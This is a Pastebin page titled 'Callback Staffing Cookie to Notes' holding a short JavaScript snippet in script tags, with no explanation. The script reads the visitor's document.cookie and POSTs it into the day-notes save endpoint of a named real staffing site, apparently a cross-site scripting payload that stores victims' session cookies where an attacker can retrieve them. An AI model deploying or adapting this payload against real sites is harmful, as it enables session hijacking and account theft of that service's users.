Advertisement
metalx1000

Callback Staffing Cookie to Notes

Aug 16th, 2015
810
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <script>
  2. var xmlhttp;
  3. if (window.XMLHttpRequest)
  4.   {// code for IE7+, Firefox, Chrome, Opera, Safari
  5.   xmlhttp=new XMLHttpRequest();
  6.   }
  7. else
  8.   {// code for IE6, IE5
  9.   xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  10.   }
  11.  
  12. cookie=document.cookie;
  13. xmlhttp.open("POST","https://www.callbackstaffing.com/Application/Ajax/Process/DayNotes/Save/",true);
  14. xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
  15. xmlhttp.send("date=2015-01-01&notes="+cookie+"&activities=");
  16. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement